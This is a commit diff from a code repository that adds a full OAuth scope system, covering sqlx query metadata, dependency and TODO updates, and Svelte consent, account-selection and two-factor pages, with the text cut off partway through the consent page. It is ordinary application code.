this repo has no description

OAuth scopes full impl.

lewis 17e3fd87 0923909a

Changed files
+9826 -2829
.sqlx
frontend
migrations
src
tests
+17
.sqlx/query-0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO oauth_scope_preference (did, client_id, scope, granted, created_at, updated_at)\n VALUES ($1, $2, $3, $4, NOW(), NOW())\n ON CONFLICT (did, client_id, scope) DO UPDATE SET granted = $4, updated_at = NOW()\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text", 10 + "Text", 11 + "Bool" 12 + ] 13 + }, 14 + "nullable": [] 15 + }, 16 + "hash": "0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114" 17 + }
+29
.sqlx/query-10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT scope, granted FROM oauth_scope_preference\n WHERE did = $1 AND client_id = $2\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "scope", 9 + "type_info": "Text" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "granted", 14 + "type_info": "Bool" 15 + } 16 + ], 17 + "parameters": { 18 + "Left": [ 19 + "Text", 20 + "Text" 21 + ] 22 + }, 23 + "nullable": [ 24 + false, 25 + false 26 + ] 27 + }, 28 + "hash": "10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f" 29 + }
+22
.sqlx/query-1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "SELECT r.repo_root_cid FROM repos r JOIN users u ON r.user_id = u.id WHERE u.did = $1", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "repo_root_cid", 9 + "type_info": "Text" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text" 15 + ] 16 + }, 17 + "nullable": [ 18 + false 19 + ] 20 + }, 21 + "hash": "1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe" 22 + }
+29
.sqlx/query-15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)\n VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n RETURNING seq\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "seq", 9 + "type_info": "Int8" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text", 15 + "Text", 16 + "Text", 17 + "Text", 18 + "Jsonb", 19 + "TextArray", 20 + "TextArray", 21 + "Text" 22 + ] 23 + }, 24 + "nullable": [ 25 + false 26 + ] 27 + }, 28 + "hash": "15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e" 29 + }
+26
.sqlx/query-53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids)\n VALUES ($1, 'commit', $2, $2, $3, $4, $5)\n RETURNING seq\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "seq", 9 + "type_info": "Int8" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text", 15 + "Text", 16 + "Jsonb", 17 + "TextArray", 18 + "TextArray" 19 + ] 20 + }, 21 + "nullable": [ 22 + false 23 + ] 24 + }, 25 + "hash": "53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe" 26 + }
+15
.sqlx/query-833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n UPDATE oauth_authorization_request\n SET parameters = jsonb_set(parameters, '{scope}', to_jsonb($2::text))\n WHERE id = $1\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text" 10 + ] 11 + }, 12 + "nullable": [] 13 + }, 14 + "hash": "833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91" 15 + }
+15
.sqlx/query-859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n DELETE FROM oauth_scope_preference\n WHERE did = $1 AND client_id = $2\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text" 10 + ] 11 + }, 12 + "nullable": [] 13 + }, 14 + "hash": "859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0" 15 + }
-34
.sqlx/query-94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT preferred_comms_channel as \"channel: CommsChannel\" FROM users WHERE did = $1", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "channel: CommsChannel", 9 - "type_info": { 10 - "Custom": { 11 - "name": "comms_channel", 12 - "kind": { 13 - "Enum": [ 14 - "email", 15 - "discord", 16 - "telegram", 17 - "signal" 18 - ] 19 - } 20 - } 21 - } 22 - } 23 - ], 24 - "parameters": { 25 - "Left": [ 26 - "Text" 27 - ] 28 - }, 29 - "nullable": [ 30 - false 31 - ] 32 - }, 33 - "hash": "94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c" 34 - }
···
+16
.sqlx/query-a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n UPDATE oauth_authorization_request\n SET did = $2, device_id = $3\n WHERE id = $1\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text", 10 + "Text" 11 + ] 12 + }, 13 + "nullable": [] 14 + }, 15 + "hash": "a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c" 16 + }
+22
.sqlx/query-bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "SELECT deactivated_at IS NULL FROM users WHERE id = $1", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "?column?", 9 + "type_info": "Bool" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Uuid" 15 + ] 16 + }, 17 + "nullable": [ 18 + null 19 + ] 20 + }, 21 + "hash": "bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b" 22 + }
+9 -3
.sqlx/query-c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002.json .sqlx/query-2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d.json
··· 1 { 2 "db_name": "PostgreSQL", 3 - "query": "SELECT id, deactivated_at, takedown_ref FROM users WHERE did = $1", 4 "describe": { 5 "columns": [ 6 { ··· 10 }, 11 { 12 "ordinal": 1, 13 "name": "deactivated_at", 14 "type_info": "Timestamptz" 15 }, 16 { 17 - "ordinal": 2, 18 "name": "takedown_ref", 19 "type_info": "Text" 20 } ··· 26 }, 27 "nullable": [ 28 false, 29 true, 30 true 31 ] 32 }, 33 - "hash": "c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002" 34 }
··· 1 { 2 "db_name": "PostgreSQL", 3 + "query": "SELECT id, handle, deactivated_at, takedown_ref FROM users WHERE did = $1", 4 "describe": { 5 "columns": [ 6 { ··· 10 }, 11 { 12 "ordinal": 1, 13 + "name": "handle", 14 + "type_info": "Text" 15 + }, 16 + { 17 + "ordinal": 2, 18 "name": "deactivated_at", 19 "type_info": "Timestamptz" 20 }, 21 { 22 + "ordinal": 3, 23 "name": "takedown_ref", 24 "type_info": "Text" 25 } ··· 31 }, 32 "nullable": [ 33 false, 34 + false, 35 true, 36 true 37 ] 38 }, 39 + "hash": "2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d" 40 }
+15
.sqlx/query-ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "DELETE FROM oauth_token WHERE did = $1 AND client_id = $2", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text" 10 + ] 11 + }, 12 + "nullable": [] 13 + }, 14 + "hash": "ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd" 15 + }
-29
.sqlx/query-d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)\n VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n RETURNING seq\n ", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "seq", 9 - "type_info": "Int8" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Text", 15 - "Text", 16 - "Text", 17 - "Text", 18 - "Jsonb", 19 - "TextArray", 20 - "TextArray", 21 - "Text" 22 - ] 23 - }, 24 - "nullable": [ 25 - false 26 - ] 27 - }, 28 - "hash": "d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f" 29 - }
···
-22
.sqlx/query-ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT 1 as one FROM users WHERE handle = $1", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "one", 9 - "type_info": "Int4" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Text" 15 - ] 16 - }, 17 - "nullable": [ 18 - null 19 - ] 20 - }, 21 - "hash": "ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d" 22 - }
···
+1
Cargo.lock
··· 6207 "serde_bytes", 6208 "serde_ipld_dagcbor", 6209 "serde_json", 6210 "sha2", 6211 "sqlx", 6212 "subtle",
··· 6207 "serde_bytes", 6208 "serde_ipld_dagcbor", 6209 "serde_json", 6210 + "serde_urlencoded", 6211 "sha2", 6212 "sqlx", 6213 "subtle",
+1
Cargo.toml
··· 34 serde_ipld_dagcbor = "0.6.4" 35 ipld-core = "0.4.2" 36 serde_json = "1.0.145" 37 sha2 = "0.10.9" 38 subtle = "2.5" 39 p256 = { version = "0.13", features = ["ecdsa"] }
··· 34 serde_ipld_dagcbor = "0.6.4" 35 ipld-core = "0.4.2" 36 serde_json = "1.0.145" 37 + serde_urlencoded = "0.7" 38 sha2 = "0.10.9" 39 subtle = "2.5" 40 p256 = { version = "0.13", features = ["ecdsa"] }
+3 -13
TODO.md
··· 2 3 ## Active development 4 5 - ### OAuth scope authorization UI 6 - Display and manage OAuth scopes during authorization flows. 7 - 8 - - [ ] Parse and display requested scopes from authorization request 9 - - [ ] Human-readable scope descriptions (e.g., "Read your posts" not "app.bsky.feed.read") 10 - - [ ] Group scopes by category (read, write, admin, etc.) 11 - - [ ] Allow users to uncheck optional scopes before authorizing 12 - - [ ] Distinguish required vs optional scopes in UI 13 - - [ ] Remember scope preferences per client (don't ask again for same scopes) 14 - - [ ] Token endpoint respects user's scope selections 15 - - [ ] Protected endpoints check token scopes before allowing operations 16 - 17 ### Frontend 18 So like... make the thing unique, make it cool. 19 ··· 90 91 OAuth 2.1: Authorization server metadata, JWKS, PAR, authorize endpoint with login UI, token endpoint (auth code + refresh), revocation, introspection, DPoP, PKCE S256, client metadata validation, private_key_jwt verification. 92 93 App endpoints: getPreferences, putPreferences, getProfile, getProfiles, getTimeline, getAuthorFeed, getActorLikes, getPostThread, getFeed, registerPush (all with local-first + proxy fallback). 94 95 Infrastructure: Sequencer with cursor replay, postgres repo storage with atomic transactions, valkey DID cache, debounced crawler notifications with circuit breakers, multi-channel notifications (email/Discord/Telegram/Signal), image processing, distributed rate limiting, security hardening. 96 97 - Web UI: OAuth login, registration, email verification, password reset, multi-account selector, dashboard, sessions, app passwords, invites, notification preferences, repo browser, CAR export, admin panel. 98 99 Auth: ES256K + HS256 dual support, JTI-only token storage, refresh token family tracking, encrypted signing keys (AES-256-GCM), DPoP replay protection, constant-time comparisons.
··· 2 3 ## Active development 4 5 ### Frontend 6 So like... make the thing unique, make it cool. 7 ··· 78 79 OAuth 2.1: Authorization server metadata, JWKS, PAR, authorize endpoint with login UI, token endpoint (auth code + refresh), revocation, introspection, DPoP, PKCE S256, client metadata validation, private_key_jwt verification. 80 81 + OAuth Scope Enforcement: Full granular scope system with consent UI, human-readable scope descriptions, per-client scope preferences, scope parsing (repo/blob/rpc/account/identity), endpoint-level scope checks, DPoP token support in auth extractors, token revocation on re-authorization, response_mode support (query/fragment). 82 + 83 App endpoints: getPreferences, putPreferences, getProfile, getProfiles, getTimeline, getAuthorFeed, getActorLikes, getPostThread, getFeed, registerPush (all with local-first + proxy fallback). 84 85 Infrastructure: Sequencer with cursor replay, postgres repo storage with atomic transactions, valkey DID cache, debounced crawler notifications with circuit breakers, multi-channel notifications (email/Discord/Telegram/Signal), image processing, distributed rate limiting, security hardening. 86 87 + Web UI: OAuth login, registration, email verification, password reset, multi-account selector, dashboard, sessions, app passwords, invites, notification preferences, repo browser, CAR export, admin panel, OAuth consent screen with scope selection. 88 89 Auth: ES256K + HS256 dual support, JTI-only token storage, refresh token family tracking, encrypted signing keys (AES-256-GCM), DPoP replay protection, constant-time comparisons.
+15
frontend/src/App.svelte
··· 13 import Notifications from './routes/Notifications.svelte' 14 import RepoExplorer from './routes/RepoExplorer.svelte' 15 import Admin from './routes/Admin.svelte' 16 17 const auth = getAuthState() 18 ··· 46 return RepoExplorer 47 case '/admin': 48 return Admin 49 default: 50 return auth.session ? Dashboard : Login 51 }
··· 13 import Notifications from './routes/Notifications.svelte' 14 import RepoExplorer from './routes/RepoExplorer.svelte' 15 import Admin from './routes/Admin.svelte' 16 + import OAuthConsent from './routes/OAuthConsent.svelte' 17 + import OAuthLogin from './routes/OAuthLogin.svelte' 18 + import OAuthAccounts from './routes/OAuthAccounts.svelte' 19 + import OAuth2FA from './routes/OAuth2FA.svelte' 20 + import OAuthError from './routes/OAuthError.svelte' 21 22 const auth = getAuthState() 23 ··· 51 return RepoExplorer 52 case '/admin': 53 return Admin 54 + case '/oauth/consent': 55 + return OAuthConsent 56 + case '/oauth/login': 57 + return OAuthLogin 58 + case '/oauth/accounts': 59 + return OAuthAccounts 60 + case '/oauth/2fa': 61 + return OAuth2FA 62 + case '/oauth/error': 63 + return OAuthError 64 default: 65 return auth.session ? Dashboard : Login 66 }
+7 -2
frontend/src/lib/router.svelte.ts
··· 1 - let currentPath = $state(window.location.hash.slice(1) || '/') 2 3 window.addEventListener('hashchange', () => { 4 - currentPath = window.location.hash.slice(1) || '/' 5 }) 6 7 export function navigate(path: string) {
··· 1 + let currentPath = $state(getPathWithoutQuery(window.location.hash.slice(1) || '/')) 2 + 3 + function getPathWithoutQuery(hash: string): string { 4 + const queryIndex = hash.indexOf('?') 5 + return queryIndex === -1 ? hash : hash.slice(0, queryIndex) 6 + } 7 8 window.addEventListener('hashchange', () => { 9 + currentPath = getPathWithoutQuery(window.location.hash.slice(1) || '/') 10 }) 11 12 export function navigate(path: string) {
+213
frontend/src/routes/OAuth2FA.svelte
···
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + let code = $state('') 5 + let submitting = $state(false) 6 + let error = $state<string | null>(null) 7 + 8 + function getRequestUri(): string | null { 9 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 10 + return params.get('request_uri') 11 + } 12 + 13 + function getChannel(): string { 14 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 15 + return params.get('channel') || 'email' 16 + } 17 + 18 + async function handleSubmit(e: Event) { 19 + e.preventDefault() 20 + const requestUri = getRequestUri() 21 + if (!requestUri) { 22 + error = 'Missing request_uri parameter' 23 + return 24 + } 25 + 26 + submitting = true 27 + error = null 28 + 29 + try { 30 + const response = await fetch('/oauth/authorize/2fa', { 31 + method: 'POST', 32 + headers: { 33 + 'Content-Type': 'application/json', 34 + 'Accept': 'application/json' 35 + }, 36 + body: JSON.stringify({ 37 + request_uri: requestUri, 38 + code: code.trim() 39 + }) 40 + }) 41 + 42 + const data = await response.json() 43 + 44 + if (!response.ok) { 45 + error = data.error_description || data.error || 'Verification failed' 46 + submitting = false 47 + return 48 + } 49 + 50 + if (data.redirect_uri) { 51 + window.location.href = data.redirect_uri 52 + return 53 + } 54 + 55 + error = 'Unexpected response from server' 56 + submitting = false 57 + } catch { 58 + error = 'Failed to connect to server' 59 + submitting = false 60 + } 61 + } 62 + 63 + function handleCancel() { 64 + const requestUri = getRequestUri() 65 + if (requestUri) { 66 + navigate(`/oauth/login?request_uri=${encodeURIComponent(requestUri)}`) 67 + } else { 68 + window.history.back() 69 + } 70 + } 71 + 72 + let channel = $derived(getChannel()) 73 + </script> 74 + 75 + <div class="oauth-2fa-container"> 76 + <h1>Two-Factor Authentication</h1> 77 + <p class="subtitle"> 78 + A verification code has been sent to your {channel}. 79 + Enter the code below to continue. 80 + </p> 81 + 82 + {#if error} 83 + <div class="error">{error}</div> 84 + {/if} 85 + 86 + <form onsubmit={handleSubmit}> 87 + <div class="field"> 88 + <label for="code">Verification Code</label> 89 + <input 90 + id="code" 91 + type="text" 92 + bind:value={code} 93 + placeholder="Enter 6-digit code" 94 + disabled={submitting} 95 + required 96 + maxlength="6" 97 + pattern="[0-9]{6}" 98 + autocomplete="one-time-code" 99 + inputmode="numeric" 100 + /> 101 + </div> 102 + 103 + <div class="actions"> 104 + <button type="button" class="cancel-btn" onclick={handleCancel} disabled={submitting}> 105 + Cancel 106 + </button> 107 + <button type="submit" class="submit-btn" disabled={submitting || code.trim().length !== 6}> 108 + {submitting ? 'Verifying...' : 'Verify'} 109 + </button> 110 + </div> 111 + </form> 112 + </div> 113 + 114 + <style> 115 + .oauth-2fa-container { 116 + max-width: 400px; 117 + margin: 4rem auto; 118 + padding: 2rem; 119 + } 120 + 121 + h1 { 122 + margin: 0 0 0.5rem 0; 123 + } 124 + 125 + .subtitle { 126 + color: var(--text-secondary); 127 + margin: 0 0 2rem 0; 128 + } 129 + 130 + form { 131 + display: flex; 132 + flex-direction: column; 133 + gap: 1rem; 134 + } 135 + 136 + .field { 137 + display: flex; 138 + flex-direction: column; 139 + gap: 0.25rem; 140 + } 141 + 142 + label { 143 + font-size: 0.875rem; 144 + font-weight: 500; 145 + } 146 + 147 + input { 148 + padding: 0.75rem; 149 + border: 1px solid var(--border-color-light); 150 + border-radius: 4px; 151 + font-size: 1.5rem; 152 + letter-spacing: 0.5em; 153 + text-align: center; 154 + background: var(--bg-input); 155 + color: var(--text-primary); 156 + } 157 + 158 + input:focus { 159 + outline: none; 160 + border-color: var(--accent); 161 + } 162 + 163 + .error { 164 + padding: 0.75rem; 165 + background: var(--error-bg); 166 + border: 1px solid var(--error-border); 167 + border-radius: 4px; 168 + color: var(--error-text); 169 + margin-bottom: 1rem; 170 + } 171 + 172 + .actions { 173 + display: flex; 174 + gap: 1rem; 175 + margin-top: 0.5rem; 176 + } 177 + 178 + .actions button { 179 + flex: 1; 180 + padding: 0.75rem; 181 + border: none; 182 + border-radius: 4px; 183 + font-size: 1rem; 184 + cursor: pointer; 185 + transition: background-color 0.15s; 186 + } 187 + 188 + .actions button:disabled { 189 + opacity: 0.6; 190 + cursor: not-allowed; 191 + } 192 + 193 + .cancel-btn { 194 + background: var(--bg-secondary); 195 + color: var(--text-primary); 196 + border: 1px solid var(--border-color); 197 + } 198 + 199 + .cancel-btn:hover:not(:disabled) { 200 + background: var(--error-bg); 201 + border-color: var(--error-border); 202 + color: var(--error-text); 203 + } 204 + 205 + .submit-btn { 206 + background: var(--accent); 207 + color: white; 208 + } 209 + 210 + .submit-btn:hover:not(:disabled) { 211 + background: var(--accent-hover); 212 + } 213 + </style>
+264
frontend/src/routes/OAuthAccounts.svelte
···
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + interface AccountInfo { 5 + did: string 6 + handle: string 7 + email: string 8 + } 9 + 10 + let loading = $state(true) 11 + let error = $state<string | null>(null) 12 + let submitting = $state(false) 13 + let accounts = $state<AccountInfo[]>([]) 14 + 15 + function getRequestUri(): string | null { 16 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 17 + return params.get('request_uri') 18 + } 19 + 20 + async function fetchAccounts() { 21 + const requestUri = getRequestUri() 22 + if (!requestUri) { 23 + error = 'Missing request_uri parameter' 24 + loading = false 25 + return 26 + } 27 + 28 + try { 29 + const response = await fetch(`/oauth/authorize/accounts?request_uri=${encodeURIComponent(requestUri)}`) 30 + if (!response.ok) { 31 + const data = await response.json() 32 + error = data.error_description || data.error || 'Failed to load accounts' 33 + loading = false 34 + return 35 + } 36 + const data = await response.json() 37 + accounts = data.accounts || [] 38 + } catch { 39 + error = 'Failed to connect to server' 40 + } finally { 41 + loading = false 42 + } 43 + } 44 + 45 + async function handleSelectAccount(did: string) { 46 + const requestUri = getRequestUri() 47 + if (!requestUri) { 48 + error = 'Missing request_uri parameter' 49 + return 50 + } 51 + 52 + submitting = true 53 + error = null 54 + 55 + try { 56 + const response = await fetch('/oauth/authorize/select', { 57 + method: 'POST', 58 + headers: { 59 + 'Content-Type': 'application/json', 60 + 'Accept': 'application/json' 61 + }, 62 + body: JSON.stringify({ 63 + request_uri: requestUri, 64 + did 65 + }) 66 + }) 67 + 68 + const data = await response.json() 69 + 70 + if (!response.ok) { 71 + error = data.error_description || data.error || 'Selection failed' 72 + submitting = false 73 + return 74 + } 75 + 76 + if (data.needs_2fa) { 77 + navigate(`/oauth/2fa?request_uri=${encodeURIComponent(requestUri)}&channel=${encodeURIComponent(data.channel || '')}`) 78 + return 79 + } 80 + 81 + if (data.redirect_uri) { 82 + window.location.href = data.redirect_uri 83 + return 84 + } 85 + 86 + error = 'Unexpected response from server' 87 + submitting = false 88 + } catch { 89 + error = 'Failed to connect to server' 90 + submitting = false 91 + } 92 + } 93 + 94 + function handleDifferentAccount() { 95 + const requestUri = getRequestUri() 96 + if (requestUri) { 97 + navigate(`/oauth/login?request_uri=${encodeURIComponent(requestUri)}`) 98 + } else { 99 + navigate('/oauth/login') 100 + } 101 + } 102 + 103 + $effect(() => { 104 + fetchAccounts() 105 + }) 106 + </script> 107 + 108 + <div class="oauth-accounts-container"> 109 + {#if loading} 110 + <div class="loading"> 111 + <p>Loading accounts...</p> 112 + </div> 113 + {:else if error} 114 + <div class="error-container"> 115 + <h1>Error</h1> 116 + <div class="error">{error}</div> 117 + <button type="button" onclick={handleDifferentAccount}> 118 + Sign in with different account 119 + </button> 120 + </div> 121 + {:else} 122 + <h1>Choose an Account</h1> 123 + <p class="subtitle">Select an account to continue</p> 124 + 125 + <div class="accounts-list"> 126 + {#each accounts as account} 127 + <button 128 + type="button" 129 + class="account-item" 130 + class:disabled={submitting} 131 + onclick={() => !submitting && handleSelectAccount(account.did)} 132 + > 133 + <div class="account-info"> 134 + <span class="account-handle">@{account.handle}</span> 135 + <span class="account-email">{account.email}</span> 136 + </div> 137 + </button> 138 + {/each} 139 + </div> 140 + 141 + <button type="button" class="secondary different-account" onclick={handleDifferentAccount}> 142 + Sign in to different account 143 + </button> 144 + {/if} 145 + </div> 146 + 147 + <style> 148 + .oauth-accounts-container { 149 + max-width: 400px; 150 + margin: 4rem auto; 151 + padding: 2rem; 152 + } 153 + 154 + h1 { 155 + margin: 0 0 0.5rem 0; 156 + } 157 + 158 + .subtitle { 159 + color: var(--text-secondary); 160 + margin: 0 0 2rem 0; 161 + } 162 + 163 + .loading { 164 + display: flex; 165 + align-items: center; 166 + justify-content: center; 167 + min-height: 200px; 168 + color: var(--text-secondary); 169 + } 170 + 171 + .error-container { 172 + text-align: center; 173 + } 174 + 175 + .error { 176 + padding: 0.75rem; 177 + background: var(--error-bg); 178 + border: 1px solid var(--error-border); 179 + border-radius: 4px; 180 + color: var(--error-text); 181 + margin-bottom: 1rem; 182 + } 183 + 184 + .accounts-list { 185 + display: flex; 186 + flex-direction: column; 187 + gap: 0.5rem; 188 + margin-bottom: 1rem; 189 + } 190 + 191 + .account-item { 192 + display: flex; 193 + align-items: center; 194 + padding: 1rem; 195 + background: var(--bg-card); 196 + border: 1px solid var(--border-color); 197 + border-radius: 8px; 198 + cursor: pointer; 199 + text-align: left; 200 + width: 100%; 201 + transition: border-color 0.15s, box-shadow 0.15s; 202 + } 203 + 204 + .account-item:hover:not(.disabled) { 205 + border-color: var(--accent); 206 + box-shadow: 0 2px 8px rgba(77, 166, 255, 0.15); 207 + } 208 + 209 + .account-item.disabled { 210 + opacity: 0.6; 211 + cursor: not-allowed; 212 + } 213 + 214 + .account-info { 215 + display: flex; 216 + flex-direction: column; 217 + gap: 0.25rem; 218 + } 219 + 220 + .account-handle { 221 + font-weight: 500; 222 + color: var(--text-primary); 223 + } 224 + 225 + .account-email { 226 + font-size: 0.875rem; 227 + color: var(--text-secondary); 228 + } 229 + 230 + button { 231 + padding: 0.75rem; 232 + background: var(--accent); 233 + color: white; 234 + border: none; 235 + border-radius: 4px; 236 + font-size: 1rem; 237 + cursor: pointer; 238 + } 239 + 240 + button:hover:not(:disabled) { 241 + background: var(--accent-hover); 242 + } 243 + 244 + button:disabled { 245 + opacity: 0.6; 246 + cursor: not-allowed; 247 + } 248 + 249 + button.secondary { 250 + background: transparent; 251 + color: var(--accent); 252 + border: 1px solid var(--accent); 253 + width: 100%; 254 + } 255 + 256 + button.secondary:hover:not(:disabled) { 257 + background: var(--accent); 258 + color: white; 259 + } 260 + 261 + .different-account { 262 + margin-top: 1rem; 263 + } 264 + </style>
+451
frontend/src/routes/OAuthConsent.svelte
···
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + interface ScopeInfo { 5 + scope: string 6 + category: string 7 + required: boolean 8 + description: string 9 + display_name: string 10 + granted: boolean | null 11 + } 12 + 13 + interface ConsentData { 14 + request_uri: string 15 + client_id: string 16 + client_name: string | null 17 + client_uri: string | null 18 + logo_uri: string | null 19 + scopes: ScopeInfo[] 20 + show_consent: boolean 21 + did: string 22 + } 23 + 24 + let loading = $state(true) 25 + let error = $state<string | null>(null) 26 + let submitting = $state(false) 27 + let consentData = $state<ConsentData | null>(null) 28 + let scopeSelections = $state<Record<string, boolean>>({}) 29 + let rememberChoice = $state(false) 30 + 31 + function getRequestUri(): string | null { 32 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 33 + return params.get('request_uri') 34 + } 35 + 36 + async function fetchConsentData() { 37 + const requestUri = getRequestUri() 38 + if (!requestUri) { 39 + error = 'Missing request_uri parameter' 40 + loading = false 41 + return 42 + } 43 + 44 + try { 45 + const response = await fetch(`/oauth/authorize/consent?request_uri=${encodeURIComponent(requestUri)}`) 46 + if (!response.ok) { 47 + const data = await response.json() 48 + error = data.error_description || data.error || 'Failed to load consent data' 49 + loading = false 50 + return 51 + } 52 + const data: ConsentData = await response.json() 53 + consentData = data 54 + 55 + for (const scope of data.scopes) { 56 + if (scope.required) { 57 + scopeSelections[scope.scope] = true 58 + } else if (scope.granted !== null) { 59 + scopeSelections[scope.scope] = scope.granted 60 + } else { 61 + scopeSelections[scope.scope] = true 62 + } 63 + } 64 + 65 + if (!data.show_consent) { 66 + await submitConsent() 67 + } 68 + } catch { 69 + error = 'Failed to connect to server' 70 + } finally { 71 + loading = false 72 + } 73 + } 74 + 75 + async function submitConsent() { 76 + if (!consentData) return 77 + 78 + submitting = true 79 + const approvedScopes = Object.entries(scopeSelections) 80 + .filter(([_, approved]) => approved) 81 + .map(([scope]) => scope) 82 + 83 + try { 84 + const response = await fetch('/oauth/authorize/consent', { 85 + method: 'POST', 86 + headers: { 'Content-Type': 'application/json' }, 87 + body: JSON.stringify({ 88 + request_uri: consentData.request_uri, 89 + approved_scopes: approvedScopes, 90 + remember: rememberChoice 91 + }) 92 + }) 93 + 94 + if (!response.ok) { 95 + const data = await response.json() 96 + error = data.error_description || data.error || 'Authorization failed' 97 + submitting = false 98 + return 99 + } 100 + 101 + const data = await response.json() 102 + if (data.redirect_uri) { 103 + window.location.href = data.redirect_uri 104 + } 105 + } catch { 106 + error = 'Failed to complete authorization' 107 + submitting = false 108 + } 109 + } 110 + 111 + async function handleDeny() { 112 + if (!consentData) return 113 + 114 + submitting = true 115 + try { 116 + const response = await fetch('/oauth/authorize/deny', { 117 + method: 'POST', 118 + headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, 119 + body: `request_uri=${encodeURIComponent(consentData.request_uri)}` 120 + }) 121 + 122 + if (response.redirected) { 123 + window.location.href = response.url 124 + } 125 + } catch { 126 + error = 'Failed to deny authorization' 127 + submitting = false 128 + } 129 + } 130 + 131 + function handleScopeToggle(scope: string) { 